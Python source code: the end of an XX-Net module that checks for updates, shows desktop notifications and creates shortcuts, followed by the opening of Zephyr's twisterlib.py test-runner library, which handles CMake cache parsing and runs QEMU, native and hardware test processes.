check_update(): try: update_rule = config.get(["update", "check_update"], "stable") if update_rule == "dont-check": return check_push_update() if update_rule != "stable" and update_rule != "test": return versions = update_from_github.get_github_versions() current_version = update_from_github.current_version() if update_rule == "test": if LooseVersion(current_version) < LooseVersion(versions[0][1]): xlog.info("update to test version %s", versions[0][1]) update_from_github.update_version(versions[0][1]) elif update_rule == "stable": if LooseVersion(current_version) < LooseVersion(versions[1][1]): xlog.info("update to stable version %s", versions[1][1]) update_from_github.update_version(versions[1][1]) except IOError as e: xlog.warn("check update fail:%r", e) except Exception as e: xlog.exception("check_update fail:%r", e) def check_push_update(): global update_content, update_dict try: opener = get_opener() req_url = update_url + "?uuid=" + get_uuid() \ + "&version=" + update_from_github.current_version() \ + "&platform=" + platform.platform() try: update_content = opener.open(req_url).read() except Exception as e: xlog.warn("check_update fail:%r", e) return False update_dict = json.loads(update_content) return True for module in update_dict["modules"]: new_version = str(update_dict["modules"][module]["last_version"]) describe = update_dict["modules"][module]["versions"][new_version]["describe"] if update_dict["modules"][module]["versions"][new_version]["notify"] != "true": continue if not module in config.config["modules"]: ignore_version = 0 current_version = 0 config.config["modules"][module] = {} config.config["modules"][module]["current_version"] = '0.0.0' else: current_version = config.get(["modules", module, "current_version"]) if "ignore_version" in config.config["modules"][module]: ignore_version = config.config["modules"][module]["ignore_version"] else: ignore_version = current_version if version_to_bin(new_version) <= version_to_bin(ignore_version): continue if version_to_bin(new_version) > version_to_bin(current_version): xlog.info("new %s version:%s", module, new_version) if sys.platform == "linux" or sys.platform == "linux2": from gtk_tray import sys_tray msg = "Module %s new version: %s, Download?\nNew:%s" % (module, new_version, describe) data_download = "%s|%s|download" % (module, new_version) data_ignore = "%s|%s|ignore" % (module, new_version) buttons = {1: {"data":data_download, "label":"Download", 'callback':general_gtk_callback}, 2: {"data":data_ignore, "label":"Ignore", 'callback':general_gtk_callback}} sys_tray.notify_general(msg=msg, title="New Version", buttons=buttons) elif sys.platform == "win32": from win_tray import sys_tray msg = "Module %s new version: %s, Download?" % (module, new_version) if sys_tray.dialog_yes_no(msg, u"Download", None, None) == 1: download_module(module, new_version) else: ignore_module(module, new_version) elif sys.platform == "darwin": from mac_tray import sys_tray msg = "Module %s new version: %s, Download?" % (module, new_version) if sys_tray.presentAlert_withTitle_(msg, "Download"): download_module(module, new_version) else: ignore_module(module, new_version) else: download_module(module, new_version) except Exception as e: xlog.exception("check_update except:%s", e) return def create_desktop_shortcut(): import sys if sys.platform.startswith("linux"): pass elif sys.platform == "win32": # import ctypes # msg = u"是否在桌面创建图标?" # title = u"XX-Net 叉叉网" #res = ctypes.windll.user32.MessageBoxW(None, msg, title, 1) # Yes:1 No:2 #if res == 2: # return work_path = os.path.dirname(os.path.abspath(__file__)) os.chdir(work_path) import subprocess subprocess.call(["Wscript.exe", "//E:JScript", "create_shortcut.js"], shell=False) def notify_install_tcpz_for_winXp(): import ctypes ctypes.windll.user32.MessageBoxW(None, u"请使用tcp-z对 tcpip.sys 打补丁,解决链接并发限制!", u"Patch XP needed", 0) def check_new_machine(): current_path = os.path.dirname(os.path.abspath(__file__)) if current_path != config.get(["update", "last_path"], ""): config.set(["update", "last_path"], current_path) config.save() if sys.platform == "win32" and platform.release() == "XP": notify_install_tcpz_for_winXp() xlog.info("generate desktop shortcut") create_desktop_shortcut() def check_loop(): check_new_machine() #wait gae_proxy to start #update need gae_proxy as proxy time.sleep(1) while True: check_update() time.sleep(3600 * 24) def start(): p = threading.Thread(target=check_loop) p.setDaemon(True) p.start() def need_new_uuid(): if not config.get(["update", "uuid"]): xlog.info("need_new_uuid: uuid is empty") return True return False def generate_new_uuid(): xx_net_uuid = str(uuid.uuid4()) config.set(["update", "uuid"], xx_net_uuid) xlog.info("generate uuid:%s", xx_net_uuid) config.save() def get_uuid(): if need_new_uuid(): generate_new_uuid() xx_net_uuid = config.get(["update", "uuid"]) xlog.info("get uuid:%s", xx_net_uuid) return xx_net_uuid if __name__ == "__main__": #get_uuid() #check_update() #sys_tray.serve_forever() create_desktop_shortcut()
twisterlib.py
#!/usr/bin/env python3 # vim: set syntax=python ts=4 : # # Copyright (c) 2018 Intel Corporation # SPDX-License-Identifier: Apache-2.0 import os import contextlib import string import mmap import sys import re import subprocess import select import shutil import shlex import signal import threading import concurrent.futures from collections import OrderedDict import queue import time import csv import glob import concurrent import xml.etree.ElementTree as ET import logging from pathlib import Path from distutils.spawn import find_executable from colorama import Fore import pickle import platform import yaml import json from multiprocessing import Lock, Process, Value from typing import List try: # Use the C LibYAML parser if available, rather than the Python parser. # It's much faster. from yaml import CSafeLoader as SafeLoader from yaml import CDumper as Dumper except ImportError: from yaml import SafeLoader, Dumper try: import serial except ImportError: print("Install pyserial python module with pip to use --device-testing option.") try: from tabulate import tabulate except ImportError: print("Install tabulate python module with pip to use --device-testing option.") try: import psutil except ImportError: print("Install psutil python module with pip to run in Qemu.") try: import pty except ImportError as capture_error: if os.name == "nt": # "nt" means that program is running on Windows OS pass # "--device-serial-pty" option is not supported on Windows OS else: raise capture_error ZEPHYR_BASE = os.getenv("ZEPHYR_BASE") if not ZEPHYR_BASE: sys.exit("$ZEPHYR_BASE environment variable undefined") # This is needed to load edt.pickle files. sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts", "python-devicetree", "src")) from devicetree import edtlib # pylint: disable=unused-import # Use this for internal comparisons; that's what canonicalization is # for. Don't use it when invoking other components of the build system # to avoid confusing and hard to trace inconsistencies in error messages # and logs, generated Makefiles, etc. compared to when users invoke these # components directly. # Note "normalization" is different from canonicalization, see os.path. canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE) sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/")) import scl import expr_parser logger = logging.getLogger('twister') logger.setLevel(logging.DEBUG) class ExecutionCounter(object): def __init__(self, total=0): self._done = Value('i', 0) self._passed = Value('i', 0) self._skipped_configs = Value('i', 0) self._skipped_runtime = Value('i', 0) self._skipped_cases = Value('i', 0) self._error = Value('i', 0) self._failed = Value('i', 0) self._total = Value('i', total) self._cases = Value('i', 0) self.lock = Lock() @property def cases(self): with self._cases.get_lock(): return self._cases.value @cases.setter def cases(self, value): with self._cases.get_lock(): self._cases.value = value @property def skipped_cases(self): with self._skipped_cases.get_lock(): return self._skipped_cases.value @skipped_cases.setter def skipped_cases(self, value): with self._skipped_cases.get_lock(): self._skipped_cases.value = value @property def error(self): with self._error.get_lock(): return self._error.value @error.setter def error(self, value): with self._error.get_lock(): self._error.value = value @property def done(self): with self._done.get_lock(): return self._done.value @done.setter def done(self, value): with self._done.get_lock(): self._done.value = value @property def passed(self): with self._passed.get_lock(): return self._passed.value @passed.setter def passed(self, value): with self._passed.get_lock(): self._passed.value = value @property def skipped_configs(self): with self._skipped_configs.get_lock(): return self._skipped_configs.value @skipped_configs.setter def skipped_configs(self, value): with self._skipped_configs.get_lock(): self._skipped_configs.value = value @property def skipped_runtime(self): with self._skipped_runtime.get_lock(): return self._skipped_runtime.value @skipped_runtime.setter def skipped_runtime(self, value): with self._skipped_runtime.get_lock(): self._skipped_runtime.value = value @property def failed(self): with self._failed.get_lock(): return self._failed.value @failed.setter def failed(self, value): with self._failed.get_lock(): self._failed.value = value @property def total(self): with self._total.get_lock(): return self._total.value class CMakeCacheEntry: '''Represents a CMake cache entry. This class understands the type system in a CMakeCache.txt, and converts the following cache types to Python types: Cache Type Python type ---------- ------------------------------------------- FILEPATH str PATH str STRING str OR list of str (if ';' is in the value) BOOL bool INTERNAL str OR list of str (if ';' is in the value) ---------- ------------------------------------------- ''' # Regular expression for a cache entry. # # CMake variable names can include escape characters, allowing a # wider set of names than is easy to match with a regular # expression. To be permissive here, use a non-greedy match up to # the first colon (':'). This breaks if the variable name has a # colon inside, but it's good enough. CACHE_ENTRY = re.compile( r'''(?P<name>.*?) # name :(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type =(?P<value>.*) # value ''', re.X) @classmethod def _to_bool(cls, val): # Convert a CMake BOOL string into a Python bool. # # "True if the constant is 1, ON, YES, TRUE, Y, or a # non-zero number. False if the constant is 0, OFF, NO, # FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in # the suffix -NOTFOUND. Named boolean constants are # case-insensitive. If the argument is not one of these # constants, it is treated as a variable." # # https://cmake.org/cmake/help/v3.0/command/if.html val = val.upper() if val in ('ON', 'YES', 'TRUE', 'Y'): return 1 elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''): return 0 elif val.endswith('-NOTFOUND'): return 0 else: try: v = int(val) return v != 0 except ValueError as exc: raise ValueError('invalid bool {}'.format(val)) from exc @classmethod def from_line(cls, line, line_no): # Comments can only occur at the beginning of a line. # (The value of an entry could contain a comment character). if line.startswith('//') or line.startswith('#'): return None # Whitespace-only lines do not contain cache entries. if not line.strip(): return None m = cls.CACHE_ENTRY.match(line) if not m: return None name, type_, value = (m.group(g) for g in ('name', 'type', 'value')) if type_ == 'BOOL': try: value = cls._to_bool(value) except ValueError as exc: args = exc.args + ('on line {}: {}'.format(line_no, line),) raise ValueError(args) from exc elif type_ in ['STRING', 'INTERNAL']: # If the value is a CMake list (i.e. is a string which # contains a ';'), convert to a Python list. if ';' in value: value = value.split(';') return CMakeCacheEntry(name, value) def __init__(self, name, value): self.name = name self.value = value def __str__(self): fmt = 'CMakeCacheEntry(name={}, value={})' return fmt.format(self.name, self.value) class CMakeCache: '''Parses and represents a CMake cache file.''' @staticmethod def from_file(cache_file): return CMakeCache(cache_file) def __init__(self, cache_file): self.cache_file = cache_file self.load(cache_file) def load(self, cache_file): entries = [] with open(cache_file, 'r') as cache: for line_no, line in enumerate(cache): entry = CMakeCacheEntry.from_line(line, line_no) if entry: entries.append(entry) self._entries = OrderedDict((e.name, e) for e in entries) def get(self, name, default=None): entry = self._entries.get(name) if entry is not None: return entry.value else: return default def get_list(self, name, default=None): if default is None: default = [] entry = self._entries.get(name) if entry is not None: value = entry.value if isinstance(value, list): return value elif isinstance(value, str): return [value] if value else [] else: msg = 'invalid value {} type {}' raise RuntimeError(msg.format(value, type(value))) else: return default def __contains__(self, name): return name in self._entries def __getitem__(self, name): return self._entries[name].value def __setitem__(self, name, entry): if not isinstance(entry, CMakeCacheEntry): msg = 'improper type {} for value {}, expecting CMakeCacheEntry' raise TypeError(msg.format(type(entry), entry)) self._entries[name] = entry def __delitem__(self, name): del self._entries[name] def __iter__(self): return iter(self._entries.values()) class TwisterException(Exception): pass class TwisterRuntimeError(TwisterException): pass class ConfigurationError(TwisterException): def __init__(self, cfile, message): TwisterException.__init__(self, cfile + ": " + message) class BuildError(TwisterException): pass class ExecutionError(TwisterException): pass class HarnessImporter: def __init__(self, name): sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister")) module = __import__("harness") if name: my_class = getattr(module, name) else: my_class = getattr(module, "Test") self.instance = my_class() class Handler: def __init__(self, instance, type_str="build"): """Constructor """ self.state = "waiting" self.run = False self.duration = 0 self.type_str = type_str self.binary = None self.pid_fn = None self.call_make_run = False self.name = instance.name self.instance = instance self.timeout = instance.testcase.timeout self.sourcedir = instance.testcase.source_dir self.build_dir = instance.build_dir self.log = os.path.join(self.build_dir, "handler.log") self.returncode = 0 self.set_state("running", self.duration) self.generator = None self.generator_cmd = None self.args = [] self.terminated = False def set_state(self, state, duration): self.state = state self.duration = duration def get_state(self): ret = (self.state, self.duration) return ret def record(self, harness): if harness.recording: filename = os.path.join(self.build_dir, "recording.csv") with open(filename, "at") as csvfile: cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep) cw.writerow(harness.fieldnames) for instance in harness.recording: cw.writerow(instance) def terminate(self, proc): # encapsulate terminate functionality so we do it consistently where ever # we might want to terminate the proc. We need try_kill_process_by_pid # because of both how newer ninja (1.6.0 or greater) and .NET / renode # work. Newer ninja's don't seem to pass SIGTERM down to the children # so we need to use try_kill_process_by_pid. for child in psutil.Process(proc.pid).children(recursive=True): try: os.kill(child.pid, signal.SIGTERM) except ProcessLookupError: pass proc.terminate() # sleep for a while before attempting to kill time.sleep(0.5) proc.kill() self.terminated = True def add_missing_testscases(self, harness): """ If testsuite was broken by some error (e.g. timeout) it is necessary to add information about next testcases, which were not be performed due to this error. """ for c in self.instance.testcase.cases: if c not in harness.tests: harness.tests[c] = "BLOCK" class BinaryHandler(Handler): def __init__(self, instance, type_str): """Constructor @param instance Test Instance """ super().__init__(instance, type_str) self.call_west_flash = False # Tool options self.valgrind = False self.lsan = False self.asan = False self.ubsan = False self.coverage = False def try_kill_process_by_pid(self): if self.pid_fn: pid = int(open(self.pid_fn).read()) os.unlink(self.pid_fn) self.pid_fn = None # clear so we don't try to kill the binary twice try: os.kill(pid, signal.SIGTERM) except ProcessLookupError: pass def _output_reader(self, proc): self.line = proc.stdout.readline() def _output_handler(self, proc, harness): if harness.is_pytest: harness.handle(None) return log_out_fp = open(self.log, "wt") timeout_extended = False timeout_time = time.time() + self.timeout while True: this_timeout = timeout_time - time.time() if this_timeout < 0: break reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True) reader_t.start() reader_t.join(this_timeout) if not reader_t.is_alive(): line = self.line logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip())) log_out_fp.write(line.decode('utf-8')) log_out_fp.flush() harness.handle(line.decode('utf-8').rstrip()) if harness.state: if not timeout_extended or harness.capture_coverage: timeout_extended = True if harness.capture_coverage: timeout_time = time.time() + 30 else: timeout_time = time.time() + 2 else: reader_t.join(0) break try: # POSIX arch based ztests end on their own, # so let's give it up to 100ms to do so proc.wait(0.1) except subprocess.TimeoutExpired: self.terminate(proc) log_out_fp.close() def handle(self): harness_name = self.instance.testcase.harness.capitalize() harness_import = HarnessImporter(harness_name) harness = harness_import.instance harness.configure(self.instance) if self.call_make_run: command = [self.generator_cmd, "run"] elif self.call_west_flash: command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir] else: command = [self.binary] run_valgrind = False if self.valgrind and shutil.which("valgrind"): command = ["valgrind", "--error-exitcode=2", "--leak-check=full", "--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp", "--log-file=" + self.build_dir + "/valgrind.log" ] + command run_valgrind = True logger.debug("Spawning process: " + " ".join(shlex.quote(word) for word in command) + os.linesep + "in directory: " + self.build_dir) start_time = time.time() env = os.environ.copy() if self.asan: env["ASAN_OPTIONS"] = "log_path=stdout:" + \ env.get("ASAN_OPTIONS", "") if not self.lsan: env["ASAN_OPTIONS"] += "detect_leaks=0" if self.ubsan: env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \ env.get("UBSAN_OPTIONS", "") with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc: logger.debug("Spawning BinaryHandler Thread for %s" % self.name) t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True) t.start() t.join() if t.is_alive(): self.terminate(proc) t.join() proc.wait() self.returncode = proc.returncode self.try_kill_process_by_pid() handler_time = time.time() - start_time if self.coverage: subprocess.call(["GCOV_PREFIX=" + self.build_dir, "gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True) # FIXME: This is needed when killing the simulator, the console is # garbled and needs to be reset. Did not find a better way to do that. if sys.stdout.isatty(): subprocess.call(["stty", "sane"]) if harness.is_pytest: harness.pytest_run(self.log) self.instance.results = harness.tests if not self.terminated and self.returncode != 0: # When a process is killed, the default handler returns 128 + SIGTERM # so in that case the return code itself is not meaningful self.set_state("failed", handler_time) self.instance.reason = "Failed" elif run_valgrind and self.returncode == 2: self.set_state("failed", handler_time) self.instance.reason = "Valgrind error" elif harness.state: self.set_state(harness.state, handler_time) if harness.state == "failed": self.instance.reason = "Failed" else: self.set_state("timeout", handler_time) self.instance.reason = "Timeout" self.add_missing_testscases(harness) self.record(harness) class DeviceHandler(Handler): def __init__(self, instance, type_str): """Constructor @param instance Test Instance """ super().__init__(instance, type_str) self.suite = None def monitor_serial(self, ser, halt_fileno, harness): if harness.is_pytest: harness.handle(None) return log_out_fp = open(self.log, "wt") ser_fileno = ser.fileno() readlist = [halt_fileno, ser_fileno] if self.coverage: # Set capture_coverage to True to indicate that right after # test results we should get coverage data, otherwise we exit # from the test. harness.capture_coverage = True ser.flush() while ser.isOpen(): readable, _, _ = select.select(readlist, [], [], self.timeout) if halt_fileno in readable: logger.debug('halted') ser.close() break if ser_fileno not in readable: continue # Timeout. serial_line = None try: serial_line = ser.readline() except TypeError: pass except serial.SerialException: ser.close() break # Just because ser_fileno has data doesn't mean an entire line # is available yet. if serial_line: sl = serial_line.decode('utf-8', 'ignore').lstrip() logger.debug("DEVICE: {0}".format(sl.rstrip())) log_out_fp.write(sl) log_out_fp.flush() harness.handle(sl.rstrip()) if harness.state: if not harness.capture_coverage: ser.close() break log_out_fp.close() def device_is_available(self, instance): device = instance.platform.name fixture = instance.testcase.harness_config.get("fixture") for d in self.suite.duts: if fixture and fixture not in d.fixtures: continue if d.platform != device or not (d.serial or d.serial_pty): continue d.lock.acquire() avail = False if d.available: d.available = 0 d.counter += 1 avail = True d.lock.release() if avail: return d return None def make_device_available(self, serial): for d in self.suite.duts: if d.serial == serial or d.serial_pty: d.available = 1 @staticmethod def run_custom_script(script, timeout): with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc: try: stdout, _ = proc.communicate(timeout=timeout) logger.debug(stdout.decode()) except subprocess.TimeoutExpired: proc.kill() proc.communicate() logger.error("{} timed out".format(script)) def handle(self): out_state = "failed" runner = None hardware = self.device_is_available(self.instance) while not hardware: logger.debug("Waiting for device {} to become available".format(self.instance.platform.name)) time.sleep(1) hardware = self.device_is_available(self.instance) runner = hardware.runner or self.suite.west_runner serial_pty = hardware.serial_pty ser_pty_process = None if serial_pty: master, slave = pty.openpty() try: ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master) except subprocess.CalledProcessError as error: logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output)) return serial_device = os.ttyname(slave) else: serial_device = hardware.serial logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud") if (self.suite.west_flash is not None) or runner: command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir] command_extra_args = [] # There are three ways this option is used. # 1) bare: --west-flash # This results in options.west_flash == [] # 2) with a value: --west-flash="--board-id=42" # This results in options.west_flash == "--board-id=42" # 3) Multiple values: --west-flash="--board-id=42,--erase" # This results in options.west_flash == "--board-id=42 --erase" if self.suite.west_flash and self.suite.west_flash != []: command_extra_args.extend(self.suite.west_flash.split(',')) if runner: command.append("--runner") command.append(runner) board_id = hardware.probe_id or hardware.id product = hardware.product if board_id is not None: if runner == "pyocd": command_extra_args.append("--board-id") command_extra_args.append(board_id) elif runner == "nrfjprog": command_extra_args.append("--dev-id") command_extra_args.append(board_id) elif runner == "openocd" and product == "STM32 STLink": command_extra_args.append("--cmd-pre-init") command_extra_args.append("hla_serial %s" % (board_id)) elif runner == "openocd" and product == "STLINK-V3": command_extra_args.append("--cmd-pre-init") command_extra_args.append("hla_serial %s" % (board_id)) elif runner == "openocd" and product == "EDBG CMSIS-DAP": command_extra_args.append("--cmd-pre-init") command_extra_args.append("cmsis_dap_serial %s" % (board_id)) elif runner == "jlink": command.append("--tool-opt=-SelectEmuBySN %s" % (board_id)) elif runner == "stm32cubeprogrammer": command.append("--tool-opt=sn=%s" % (board_id)) if command_extra_args != []: command.append('--') command.extend(command_extra_args) else: command = [self.generator_cmd, "-C", self.build_dir, "flash"] pre_script = hardware.pre_script post_flash_script = hardware.post_flash_script post_script = hardware.post_script if pre_script: self.run_custom_script(pre_script, 30) try: ser = serial.Serial( serial_device, baudrate=hardware.baud, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, timeout=self.timeout ) except serial.SerialException as e: self.set_state("failed", 0) self.instance.reason = "Failed" logger.error("Serial device error: %s" % (str(e))) if serial_pty and ser_pty_process: ser_pty_process.terminate() outs, errs = ser_pty_process.communicate() logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs)) self.make_device_available(serial_device) return ser.flush() harness_name = self.instance.testcase.harness.capitalize() harness_import = HarnessImporter(harness_name) harness = harness_import.instance harness.configure(self.instance) read_pipe, write_pipe = os.pipe() start_time = time.time() t = threading.Thread(target=self.monitor_serial, daemon=True, args=(ser, read_pipe, harness)) t.start() d_log = "{}/device.log".format(self.instance.build_dir) logger.debug('Flash command: %s', command) try: stdout = stderr = None with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc: try: (stdout, stderr) = proc.communicate(timeout=30) logger.debug(stdout.decode()) if proc.returncode != 0: self.instance.reason = "Device issue (Flash?)" with open(d_log, "w") as dlog_fp: dlog_fp.write(stderr.decode()) os.write(write_pipe, b'x') # halt the thread out_state = "flash_error" except subprocess.TimeoutExpired: proc.kill() (stdout, stderr) = proc.communicate() self.instance.reason = "Device issue (Timeout)" with open(d_log, "w") as dlog_fp: dlog_fp.write(stderr.decode()) except subprocess.CalledProcessError: os.write(write_pipe, b'x') # halt the thread if post_flash_script: self.run_custom_script(post_flash_script, 30) t.join(self.timeout) if t.is_alive(): logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name)) out_state = "timeout" if ser.isOpen(): ser.close() if serial_pty: ser_pty_process.terminate() outs, errs = ser_pty_process.communicate() logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs)) os.close(write_pipe) os.close(read_pipe) handler_time = time.time() - start_time if out_state in ["timeout", "flash_error"]: self.add_missing_testscases(harness) if out_state == "timeout": self.instance.reason = "Timeout" elif out_state == "flash_error": self.instance.reason = "Flash error" if harness.is_pytest: harness.pytest_run(self.log) self.instance.results = harness.tests # sometimes a test instance hasn't been executed successfully with an # empty dictionary results, in order to include it into final report, # so fill the results as BLOCK if self.instance.results == {}: for k in self.instance.testcase.cases: self.instance.results[k] = 'BLOCK' if harness.state: self.set_state(harness.state, handler_time) if harness.state == "failed": self.instance.reason = "Failed" else: self.set_state(out_state, handler_time) if post_script: self.run_custom_script(post_script, 30) self.make_device_available(serial_device) self.record(harness) class QEMUHandler(Handler): """Spawns a thread to monitor QEMU output from pipes We pass QEMU_PIPE to 'make run' and monitor the pipes for output. We need to do this as once qemu starts, it runs forever until killed. Test cases emit special messages to the console as they run, we check for these to collect whether the test passed or failed. """ def __init__(self, instance, type_str): """Constructor @param instance Test instance """ super().__init__(instance, type_str) self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo") self.pid_fn = os.path.join(instance.build_dir, "qemu.pid") if "ignore_qemu_crash" in instance.testcase.tags: self.ignore_qemu_crash = True self.ignore_unexpected_eof = True else: self.ignore_qemu_crash = False self.ignore_unexpected_eof = False @staticmethod def _get_cpu_time(pid): """get process CPU time. The guest virtual time in QEMU icount mode isn't host time and it's maintained by counting guest instructions, so we use QEMU process exection time to mostly simulate the time of guest OS. """ proc = psutil.Process(pid) cpu_time = proc.cpu_times() return cpu_time.user + cpu_time.system @staticmethod def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness, ignore_unexpected_eof=False): fifo_in = fifo_fn + ".in" fifo_out = fifo_fn + ".out" # These in/out nodes are named from QEMU's perspective, not ours if os.path.exists(fifo_in): os.unlink(fifo_in) os.mkfifo(fifo_in) if os.path.exists(fifo_out): os.unlink(fifo_out) os.mkfifo(fifo_out) # We don't do anything with out_fp but we need to open it for # writing so that QEMU doesn't block, due to the way pipes work out_fp = open(fifo_in, "wb") # Disable internal buffering, we don't # want read() or poll() to ever block if there is data in there in_fp = open(fifo_out, "rb", buffering=0) log_out_fp = open(logfile, "wt") start_time = time.time() timeout_time = start_time + timeout p = select.poll() p.register(in_fp, select.POLLIN) out_state = None line = "" timeout_extended = False pid = 0 if os.path.exists(pid_fn): pid = int(open(pid_fn).read()) while True: this_timeout = int((timeout_time - time.time()) * 1000) if this_timeout < 0 or not p.poll(this_timeout): try: if pid and this_timeout > 0: #there's possibility we polled nothing because #of not enough CPU time scheduled by host for #QEMU process during p.poll(this_timeout) cpu_time = QEMUHandler._get_cpu_time(pid) if cpu_time < timeout and not out_state: timeout_time = time.time() + (timeout - cpu_time) continue except ProcessLookupError: out_state = "failed" break if not out_state: out_state = "timeout" break if pid == 0 and os.path.exists(pid_fn): pid = int(open(pid_fn).read()) if harness.is_pytest: harness.handle(None) out_state = harness.state break try: c = in_fp.read(1).decode("utf-8") except UnicodeDecodeError: # Test is writing something weird, fail out_state = "unexpected byte" break if c == "": # EOF, this shouldn't happen unless QEMU crashes if not ignore_unexpected_eof: out_state = "unexpected eof" break line = line + c if c != "\n": continue # line contains a full line of data output from QEMU log_out_fp.write(line) log_out_fp.flush() line = line.strip() logger.debug(f"QEMU ({pid}): {line}") harness.handle(line) if harness.state: # if we have registered a fail make sure the state is not # overridden by a false success message coming from the # testsuite if out_state not in ['failed', 'unexpected eof', 'unexpected byte']: out_state = harness.state # if we get some state, that means test is doing well, we reset # the timeout and wait for 2 more seconds to catch anything # printed late. We wait much longer if code # coverage is enabled since dumping this information can # take some time. if not timeout_extended or harness.capture_coverage: timeout_extended = True if harness.capture_coverage: timeout_time = time.time() + 30 else: timeout_time = time.time() + 2 line = "" if harness.is_pytest: harness.pytest_run(logfile) out_state = harness.state handler.record(harness) handler_time = time.time() - start_time logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds") if out_state == "timeout": handler.instance.reason = "Timeout" handler.set_state("failed", handler_time) elif out_state == "failed": handler.instance.reason = "Failed" handler.set_state("failed", handler_time) elif out_state in ['unexpected eof', 'unexpected byte']: handler.instance.reason = out_state handler.set_state("failed", handler_time) else: handler.set_state(out_state, handler_time) log_out_fp.close() out_fp.close() in_fp.close() if pid: try: if pid: os.kill(pid, signal.SIGTERM) except ProcessLookupError: # Oh well, as long as it's dead! User probably sent Ctrl-C pass os.unlink(fifo_in) os.unlink(fifo_out) def handle(self): self.results = {} self.run = True # We pass this to QEMU which looks for fifos with .in and .out # suffixes. self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo") self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid") if os.path.exists(self.pid_fn): os.unlink(self.pid_fn) self.log_fn = self.log harness_import = HarnessImporter(self.instance.testcase.harness.capitalize()) harness = harness_import.instance harness.configure(self.instance) self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread, args=(self, self.timeout, self.build_dir, self.log_fn, self.fifo_fn, self.pid_fn, self.results, harness, self.ignore_unexpected_eof)) self.instance.results = harness.tests self.thread.daemon = True logger.debug("Spawning QEMUHandler Thread for %s" % self.name) self.thread.start() if sys.stdout.isatty(): subprocess.call(["stty", "sane"]) logger.debug("Running %s (%s)" % (self.name, self.type_str)) command = [self.generator_cmd] command += ["-C", self.build_dir, "run"] is_timeout = False qemu_pid = None with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc: logger.debug("Spawning QEMUHandler Thread for %s" % self.name) try: proc.wait(self.timeout) except subprocess.TimeoutExpired: # sometimes QEMU can't handle SIGTERM signal correctly # in that case kill -9 QEMU process directly and leave # twister to judge testing result by console output is_timeout = True self.terminate(proc) if harness.state == "passed": self.returncode = 0 else: self.returncode = proc.returncode else: if os.path.exists(self.pid_fn): qemu_pid = int(open(self.pid_fn).read()) logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}") self.returncode = proc.returncode # Need to wait for harness to finish processing # output from QEMU. Otherwise it might miss some # error messages. self.thread.join(0) if self.thread.is_alive(): logger.debug("Timed out while monitoring QEMU output") if os.path.exists(self.pid_fn): qemu_pid = int(open(self.pid_fn).read()) os.unlink(self.pid_fn) logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}") if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state: self.set_state("failed", 0) if is_timeout: self.instance.reason = "Timeout" else: self.instance.reason = "Exited with {}".format(self.returncode) self.add_missing_testscases(harness) def get_fifo(self): return self.fifo_fn class SizeCalculator: alloc_sections = [ "bss", "noinit", "app_bss", "app_noinit", "ccm_bss", "ccm_noinit" ] rw_sections = [ "datas", "initlevel", "exceptions", "initshell", "_static_thread_data_area", "k_timer_area", "k_mem_slab_area", "k_mem_pool_area", "sw_isr_table", "k_sem_area", "k_mutex_area", "app_shmem_regions", "_k_fifo_area", "_k_lifo_area", "k_stack_area", "k_msgq_area", "k_mbox_area", "k_pipe_area", "net_if_area", "net_if_dev_area", "net_l2_area", "net_l2_data", "k_queue_area", "_net_buf_pool_area", "app_datas", "kobject_data", "mmu_tables", "app_pad", "priv_stacks", "ccm_data", "usb_descriptor", "usb_data", "usb_bos_desc", "uart_mux", 'log_backends_sections', 'log_dynamic_sections', 'log_const_sections', "app_smem", 'shell_root_cmds_sections', 'log_const_sections', "font_entry_sections", "priv_stacks_noinit", "_GCOV_BSS_SECTION_NAME", "gcov", "nocache", "devices", "k_heap_area", ] # These get copied into RAM only on non-XIP ro_sections = [ "rom_start", "text", "ctors", "init_array", "reset", "z_object_assignment_area", "rodata", "net_l2", "vector", "sw_isr_table", "settings_handler_static_area", "bt_l2cap_fixed_chan_area", "bt_l2cap_br_fixed_chan_area", "bt_gatt_service_static_area", "vectors", "net_socket_register_area", "net_ppp_proto", "shell_area", "tracing_backend_area", "ppp_protocol_handler_area", ] def __init__(self, filename, extra_sections): """Constructor @param filename Path to the output binary The <filename> is parsed by objdump to determine section sizes """ # Make sure this is an ELF binary with open(filename, "rb") as f: magic = f.read(4) try: if magic != b'\x7fELF': raise TwisterRuntimeError("%s is not an ELF binary" % filename) except Exception as e: 